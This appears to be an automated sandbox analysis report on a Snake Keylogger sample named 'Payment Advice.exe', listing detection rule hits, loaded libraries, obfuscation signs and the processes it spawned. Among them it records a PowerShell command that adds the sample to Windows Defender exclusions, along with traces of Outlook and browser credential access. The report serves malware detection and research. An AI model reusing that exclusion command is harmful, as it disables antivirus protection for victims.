                  Source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, V0od1GpONNlKZ74lAd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, V0od1GpONNlKZ74lAd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, V0od1GpONNlKZ74lAd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, V0od1GpONNlKZ74lAd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V0od1GpONNlKZ74lAd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V0od1GpONNlKZ74lAd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/6@2/2
                  Source: C:\Users\user\Desktop\Payment Advice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Advice.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjtn34di.qcx.ps1Jump to behavior
                  Source: Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Payment Advice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Payment Advice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.00000000034EE000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.00000000034DE000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.00000000034FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Payment Advice.exeVirustotal: Detection: 34%
                  Source: unknownProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Payment Advice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Payment Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Payment Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Payment Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: iAbl.pdbSHA256j~^ source: Payment Advice.exe
                  Source: Binary string: iAbl.pdb source: Payment Advice.exe

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.cs.Net Code: bAAWV5gLEV System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.2eddbfc.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.78f0000.7.raw.unpack, wnc5bH9fX7sv7Za8LK.cs.Net Code: bAAWV5gLEV System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.3f4e878.3.raw.unpack, wnc5bH9fX7sv7Za8LK.cs.Net Code: bAAWV5gLEV System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Payment Advice.exe.5f90000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: Payment Advice.exeStatic PE information: 0xD22D0139 [Sat Sep 27 02:13:13 2081 UTC]
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_0796DE05 push FFFFFF8Bh; iretd 0_2_0796DE07
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_0796DCEF push dword ptr [ebx+ebp-75h]; iretd 0_2_0796DD15
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_07968A64 pushfd ; ret 0_2_07968A65
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_0187F273 push ebp; retf 5_2_0187F281
                  Source: Payment Advice.exeStatic PE information: section name: .text entropy: 7.6054071879897105
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, u24XxM8uRIoTpav9E2.csHigh entropy of concatenated method names: 'Ios4oGXpVE', 'JaS43scBeL', 'TBt4IZVdnL', 'Nnk4EH0nCN', 'u77xs4dgjMve3awyxvI', 'O3tkUMdP1ohbgdHMHYI', 'nJx62sdojb8rgr5eyNK', 'QBh6ypdfVqfP5J2x7Rr'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V0od1GpONNlKZ74lAd.csHigh entropy of concatenated method names: 'oS3tLhb6ui', 'wnSt81ZogZ', 'niytc7xIW5', 'PkZt5RaBEy', 'pW7tA9Ks8u', 'r5OtOeiP7L', 'i67toF6ibk', 'VhVt3sAdi3', 'lp2tI0WnR1', 'r4ltEeq9p8'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, cLBVf8vxft4stwplCk.csHigh entropy of concatenated method names: 'uElDYUnniX', 'qogD1XJsBH', 'tioDVn8w2Y', 'FH4D2lL56N', 'JJqDBE6415', 't9YDlYQY0r', 'FJTDb9UAn3', 'CVHDpbkaFi', 'JBVDqG6yfg', 'CjYDdZpFKD'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, V1TjnGssHvunMsGa5Eb.csHigh entropy of concatenated method names: 'F76iEa8fgP', 'ceFizyETVh', 'A3RMwjioeJ', 'YwyMsUdBrI', 'sF0MgwYuOY', 'YQUMKETxmp', 'Xb9MWXh4Hh', 'pHwMTEuCc3', 'lFRMuSQhnO', 'BmMMtN1dst'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, Tmqavsg8mMuu42rPYF.csHigh entropy of concatenated method names: 'gBEVYjiLK', 'vDp21M1HV', 'PPll7Bbmq', 'sfGbUrCKj', 'nw5qNo1PP', 'FE8dG5wEe', 'qikmx7lMJdk2CscBwb', 'DcWTOK2vGElA0VANfu', 'C2djIZ4UW', 'Nu4irNR9L'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, e0GJdvoX7FLALSqXBB.csHigh entropy of concatenated method names: 'Dd9G4GrfyS', 'N1QGUR1VYv', 'VEbGGPruDn', 'qSCGMqqJoK', 'jOFGPSBcJ7', 'HyvGrEnRVI', 'Dispose', 'VFtjuhdk7F', 'm37jtMfqL6', 'YDyj7SNKlk'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, D7kjX5E8wnBR9dmFol.csHigh entropy of concatenated method names: 'vRBi7GLes8', 'tCPiFW8OMc', 'aeuiyIphdE', 'FhOiDjfv2O', 'gmQiGTJa1Z', 'iDDi9Wkdwk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, mLmW3OCpnpqE18nJXc.csHigh entropy of concatenated method names: 'TdlXpRo1yS', 'LKnXqqTky2', 'fmMXhJjOi7', 'xekXedIG9D', 'xahXnZt4yI', 'zp9XQ7URUX', 'J2UXxc0chi', 'yALXNNAHme', 'DVAXSfVHR9', 'CbpXmZN84s'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, D9fIhtzgI70fuFLfL8.csHigh entropy of concatenated method names: 'UJ4ilxbfNo', 'v6YipWwTKI', 'dIqiqGfbf5', 'IvMihj75aU', 'W1Bie6rgXs', 'HmSin84mgV', 'f9AiQxweq4', 'vIVirkAcEW', 'aijiYE8CSP', 'AWvi1XRxQR'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, JqfdkMd0ddEo7nCNGc.csHigh entropy of concatenated method names: 'ReLFBZWsIW', 'kjNFbN0ZCu', 'tRK76TZni3', 'Ifs7nVV66h', 'r4G7QGvEvO', 'HjA7HUKq2H', 'TAa7xeXT8Z', 'RZR7N4ud5F', 'yaR7vlAPDT', 'F117SIj26y'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, Xcvjh2qGxiEDr0S8vo.csHigh entropy of concatenated method names: 'IUW72xd9Uj', 'ivM7lRxutY', 'CZh7ph1X4N', 'i6f7qAiFxv', 'vnQ746FYok', 'Q0f7f8wLRh', 'lFX7U5fsXr', 'kKX7jpNWnQ', 'hcG7GvbnWa', 'Mft7i9ZnF9'
